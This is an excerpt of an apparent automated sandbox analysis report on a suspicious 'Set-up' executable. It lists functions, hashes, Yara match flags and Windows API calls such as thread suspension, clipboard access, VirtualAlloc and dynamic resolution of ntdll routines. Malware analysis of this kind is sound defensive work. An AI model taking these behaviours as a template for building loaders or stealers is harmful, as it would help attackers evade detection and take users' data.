                                                                                                                                  • Opcode Fuzzy Hash: d1e24e57a2514775cc17d10727ebd4cfa5190f1f8c9b5dec9cee1ccf620f94b3
                                                                                                                                  • Instruction Fuzzy Hash: D5A148716483019FDB24CE28C85577B7BE6EF81210F4AAD2DE9868B3C1E735D905CB91
                                                                                                                                  Function 05919D70 Relevance: .2, Instructions: 244COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: 0c03cdca4e6ad8349cf13fc23bd730f1a9669a66ea10b4e1dd078099aa0d9821
                                                                                                                                  • Instruction ID: e74ef5f261bdd979d0f2ce17b46169430fb0136f17222e4b8f7717e5e06f0629
                                                                                                                                  • Opcode Fuzzy Hash: 0c03cdca4e6ad8349cf13fc23bd730f1a9669a66ea10b4e1dd078099aa0d9821
                                                                                                                                  • Instruction Fuzzy Hash: 3D616A32B082245FD324DE28CC51B6BBBE3FB85614F1D862DEC8997381E631DC018B89
                                                                                                                                  Function 059024A0 Relevance: .2, Instructions: 167COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e84df79f5c60416cb13f296e0ef41803c9098193759d66e46c336af5e9fcea31
                                                                                                                                  • Instruction ID: fab1b10567518b3923ce313ced1e92cca68d017e6eb2756539e6e0e1831458c2
                                                                                                                                  • Opcode Fuzzy Hash: e84df79f5c60416cb13f296e0ef41803c9098193759d66e46c336af5e9fcea31
                                                                                                                                  • Instruction Fuzzy Hash: 5741FC745083049FD710DF24D859B2BBBEAEF82704F009D1CF4959B291E778C90ACB92
                                                                                                                                  Function 01129635 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,460C02D8,011231ED,?,00000003,0111AB4D,460C02D8,?,00E5119D,00E4FCD0,00E3A8EB,460C02D8), ref: 01129639
                                                                                                                                  • _free.LIBCMT ref: 0112966C
                                                                                                                                  • _free.LIBCMT ref: 01129694
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 011296A1
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 011296AD
                                                                                                                                  • _abort.LIBCMT ref: 011296B3
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,011247A9,0112A61C,?,0112488C,?,00000004,00000000,?,?,?,01125884,?,00000000), ref: 011296BE
                                                                                                                                  • _free.LIBCMT ref: 011296F3
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 01129727
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                  • String ID: Ph
                                                                                                                                  • API String ID: 3160817290-1269273566
                                                                                                                                  • Opcode ID: 1b11ed0f31bb42bfc7d233b7709c3286f3d42dc312ff069491820cff98ad47e4
                                                                                                                                  • Instruction ID: 21041ba602c0b3671becdcd9a3a14009d33437801ce197859b028bdee6d3bf8a
                                                                                                                                  • Opcode Fuzzy Hash: 1b11ed0f31bb42bfc7d233b7709c3286f3d42dc312ff069491820cff98ad47e4
                                                                                                                                  • Instruction Fuzzy Hash: 461127361045362BD73F263D7C98E6A269A9FC167CF220129F918D3284EF3AC865C165
                                                                                                                                  Function 058F170D Relevance: 9.2, APIs: 6, Instructions: 203COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F187B
                                                                                                                                  • ExitProcess.KERNEL32(00000003), ref: 058F1897
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F18B3
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F18CF
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F190F
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F192B
                                                                                                                                    • Part of subcall function 05911C40: OpenClipboard.USER32 ref: 05911C62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess$ClipboardOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3599724458-0
                                                                                                                                  • Opcode ID: efe17c8d90af9d06c0cb217cbda731e623b62d88f60362be8e128c15e40df5b2
                                                                                                                                  • Instruction ID: c1bedb14eb7a2432685eed851792d6703fbc0cec72c56677d91d286ea20bc0f5
                                                                                                                                  • Opcode Fuzzy Hash: efe17c8d90af9d06c0cb217cbda731e623b62d88f60362be8e128c15e40df5b2
                                                                                                                                  • Instruction Fuzzy Hash: 61510876700B408BD725EB29D85A73BB6A3AFD6614F0D852CC85B87391EA34B8068752
                                                                                                                                  Function 05470B0B Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1098 5470b0b-5470b52 CreateToolhelp32Snapshot 1101 5470c28-5470c2b 1098->1101 1102 5470b58-5470b79 Thread32First 1098->1102 1103 5470c14-5470c23 1102->1103 1104 5470b7f-5470b85 1102->1104 1103->1101 1105 5470b87-5470b8d 1104->1105 1106 5470bf4-5470c0e 1104->1106 1105->1106 1107 5470b8f-5470bae 1105->1107 1106->1103 1106->1104 1107->1106 1110 5470bb0-5470bb4 1107->1110 1111 5470bb6-5470bca Wow64SuspendThread 1110->1111 1112 5470bcc-5470bdb 1110->1112 1113 5470be0-5470bf2 CloseHandle 1111->1113 1112->1113 1113->1106
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,05470651,?,00000001,?,81EC8B55,000000FF), ref: 05470B49
                                                                                                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 05470B75
                                                                                                                                  • Wow64SuspendThread.KERNEL32(00000000), ref: 05470BC8
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 05470BF2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849706056-0
                                                                                                                                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                  • Instruction ID: 88275613ec9cca660b8611a22bfa2a9a775613137b00453cf5060992d31213d7
                                                                                                                                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                  • Instruction Fuzzy Hash: B2410A71A00108AFDB18DF98C494FEEB7B6EF88300F108069E6199B794DA74AE45CB54
                                                                                                                                  Function 058ED2C0 Relevance: 6.1, APIs: 4, Instructions: 51threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1114 58ed2c0-58ed2cb call 591ba60 1117 58ed358-58ed35a ExitProcess 1114->1117 1118 58ed2d1-58ed2d8 call 5914420 1114->1118 1121 58ed2da-58ed2eb 1118->1121 1122 58ed353 call 591cd30 1118->1122 1124 58ed2f0-58ed328 1121->1124 1122->1117 1124->1124 1125 58ed32a-58ed338 GetCurrentThreadId GetForegroundWindow 1124->1125 1126 58ed33a GetCurrentProcessId 1125->1126 1127 58ed340-58ed347 call 58ee4c0 1125->1127 1126->1127 1127->1122 1130 58ed349 call 58f10c0 1127->1130 1132 58ed34e call 58efc90 1130->1132 1132->1122
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3118123366-0
                                                                                                                                  • Opcode ID: b2bf01f2d33a2feed2c3248959558bdfb8620b286b342898f873fb462e0cbea1
                                                                                                                                  • Instruction ID: 5e60c03aac698e1fee15ec3c88e1c7c942ee428fce8f92a5e67bc56dfeb71ede
                                                                                                                                  • Opcode Fuzzy Hash: b2bf01f2d33a2feed2c3248959558bdfb8620b286b342898f873fb462e0cbea1
                                                                                                                                  • Instruction Fuzzy Hash: 7501F73171D21087DF34BB799A1F36E7BA26FE2204F19856CDD8ADB181ED244C05C652
                                                                                                                                  Function 054C2839 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1225 54c2839-54c284c 1226 54c284e-54c2851 1225->1226 1227 54c2864-54c286e 1225->1227 1228 54c2853-54c2856 1226->1228 1229 54c287d-54c2889 1227->1229 1230 54c2870-54c2878 1227->1230 1228->1227 1231 54c2858-54c2862 1228->1231 1232 54c288c-54c2891 1229->1232 1230->1229 1231->1227 1231->1228 1233 54c28c4-54c28cb LoadLibraryA 1232->1233 1234 54c2893-54c289e 1232->1234 1237 54c28ce-54c28d2 1233->1237 1235 54c28ba-54c28be 1234->1235 1236 54c28a0-54c28b8 call 54c2f07 1234->1236 1235->1232 1239 54c28c0-54c28c2 1235->1239 1236->1235 1241 54c28d3-54c28d5 1236->1241 1239->1233 1239->1237 1241->1237
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?), ref: 054C28CB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID: .dll
                                                                                                                                  • API String ID: 1029625771-2738580789
                                                                                                                                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                  • Instruction ID: 0d9c19afc971d430271569fb154028022c7aee63f332c03a6f1c84f46a70b6ba
                                                                                                                                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                  • Instruction Fuzzy Hash: A321D83D6082859FEB65CFA9C444BAA7FA4BF41250F1842EED84287741D7F0E8458760
                                                                                                                                  Function 058F1FB1 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1242 58f1fb1-58f200c CoInitializeEx * 2
                                                                                                                                  APIs
                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 058F1FB5
                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 058F1FF3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: a4e96e34c5c2454836cc1b434957e34867b9d51f6420eaa2d9440da7d0948753
                                                                                                                                  • Instruction ID: 9981c0e72993d7a6445036b0a9b989a9377652a76d201c92d6ac9ac61a96eed8
                                                                                                                                  • Opcode Fuzzy Hash: a4e96e34c5c2454836cc1b434957e34867b9d51f6420eaa2d9440da7d0948753
                                                                                                                                  • Instruction Fuzzy Hash: 9CF01C74A587409BE770AB39E50FB163E71B744701F40861CF9E61A6C9DE30541A8FD7
                                                                                                                                  Function 054C148B Relevance: 1.6, APIs: 1, Instructions: 325memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 054C1505
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                  • Instruction ID: 21f3dc19fddeba55aba76a117cc1e69b38a8d762a675de7915e11c1fca4af754
                                                                                                                                  • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                  • Instruction Fuzzy Hash: 59B11379604605ABDB61AE61CC84EFBBFE9FF85300F1015EFE58A82241E731E451CBA1
                                                                                                                                  Function 058F1207 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 058F1219
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeSecurity
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 640775948-0
                                                                                                                                  • Opcode ID: 0abdb89343d90c00b7aa932b8d42737518c3b4752db76d46048d4551505fa6ad
                                                                                                                                  • Instruction ID: aee97442b0cf4c0067419d67565fbdaa094f02b965669bf98f2e8b729025eca1
                                                                                                                                  • Opcode Fuzzy Hash: 0abdb89343d90c00b7aa932b8d42737518c3b4752db76d46048d4551505fa6ad
                                                                                                                                  • Instruction Fuzzy Hash: 66D092303E8301B6E6748618EC13F103A549705B26F702208F363EE6C1CDE079108A08

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00E4EAD0 Relevance: 78.9, APIs: 24, Strings: 21, Instructions: 125libraryloaderthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131AE20,00000001,00000000), ref: 00E4EB19
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?), ref: 00E4EB34
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlEnterCriticalSection), ref: 00E4EB42
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlLeaveCriticalSection), ref: 00E4EB53
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 00E4EB64
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryVolumeInformationFile), ref: 00E4EB75
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryObject), ref: 00E4EB86
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 00E4EB97
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlCompareUnicodeString), ref: 00E4EBA8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00E4EBB9
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 00E4EBCA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtCreateFile), ref: 00E4EBDB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtOpenFile), ref: 00E4EBEC
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtCancelIoFile), ref: 00E4EBFD
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtClose), ref: 00E4EC0E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 00E4EC1F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtOpenKeyedEvent), ref: 00E4EC30
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 00E4EC41
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 00E4EC52
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtSetInformationFile), ref: 00E4EC63
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryInformationFile), ref: 00E4EC74
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryDirectoryFile), ref: 00E4EC85
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AE20,00000002), ref: 00E4EC97
                                                                                                                                  • SwitchToThread.KERNEL32(?,?,?,?,?), ref: 00E4ECD5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ExchangeInterlocked$CompareHandleModuleSwitchThread
                                                                                                                                  • String ID: NtCancelIoFile$NtClose$NtCreateFile$NtCreateKeyedEvent$NtOpenFile$NtOpenKeyedEvent$NtQueryDirectoryFile$NtQueryInformationFile$NtQueryInformationProcess$NtQueryObject$NtQueryVolumeInformationFile$NtReleaseKeyedEvent$NtSetInformationFile$NtWaitForKeyedEvent$RtlCompareUnicodeString$RtlEnterCriticalSection$RtlGetVersion$RtlLeaveCriticalSection$RtlNtStatusToDosError$RtlVerifyVersionInfo$ntdll.dll
                                                                                                                                  • API String ID: 925111853-3771141770
                                                                                                                                  • Opcode ID: 3df8becc718e26ab30a328e34bb31b9341cff35d2e972572ed01fe4689fe2fd1
                                                                                                                                  • Instruction ID: a080e629e82483f0985af96f7e4e58eb98eb411f1de807ab44c387ba8937b9ab
                                                                                                                                  • Opcode Fuzzy Hash: 3df8becc718e26ab30a328e34bb31b9341cff35d2e972572ed01fe4689fe2fd1
                                                                                                                                  • Instruction Fuzzy Hash: 0F4193785D1710AFE3399F21E889A6A3FB9FB19712F001079FC25D120CD7B82655CB65
                                                                                                                                  Function 00E323B0 Relevance: 70.7, APIs: 29, Strings: 11, Instructions: 674libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E4EAD0: InterlockedCompareExchange.KERNEL32(0131AE20,00000001,00000000), ref: 00E4EB19
                                                                                                                                    • Part of subcall function 00E4EAD0: GetModuleHandleW.KERNEL32(ntdll.dll,?,?), ref: 00E4EB34
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlEnterCriticalSection), ref: 00E4EB42
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlLeaveCriticalSection), ref: 00E4EB53
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 00E4EB64
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtQueryVolumeInformationFile), ref: 00E4EB75
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtQueryObject), ref: 00E4EB86
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 00E4EB97
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlCompareUnicodeString), ref: 00E4EBA8
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00E4EBB9
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 00E4EBCA
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtCreateFile), ref: 00E4EBDB
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtOpenFile), ref: 00E4EBEC
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtCancelIoFile), ref: 00E4EBFD
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtClose), ref: 00E4EC0E
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 00E4EC1F
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtOpenKeyedEvent), ref: 00E4EC30
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 00E4EC41
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 00E4EC52
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00E4E01F
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 00E4E027
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 00E4E02F
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 00E4E037
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000002), ref: 00E4E0BA
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00E4E0FE
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00E4E165
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000001,00000001), ref: 00E4E1CD
                                                                                                                                  • GetLastError.KERNEL32(00000107,?,?,00000000), ref: 00E4E2FD
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00E4E320
                                                                                                                                  • LoadLibraryW.KERNEL32(00000000,version.dll,00000000,00000107,?,?,00000000), ref: 00E4E3EB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeW), ref: 00E4E41C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoW), ref: 00E4E42E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerQueryValueW), ref: 00E4E440
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00E4E5B4
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 00E4E5BC
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000004,00000001), ref: 00E4E5F4
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000020,00000001), ref: 00E4E664
                                                                                                                                  • LoadLibraryW.KERNEL32(00000000,netapi32.dll,?), ref: 00E4E731
                                                                                                                                  • GetProcAddress.KERNEL32(?,NetWkstaGetInfo), ref: 00E4E757
                                                                                                                                  • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00E4E765
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00E4E7CF
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 00E4E7D7
                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00E4E830
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00E4E847
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00E4E85F
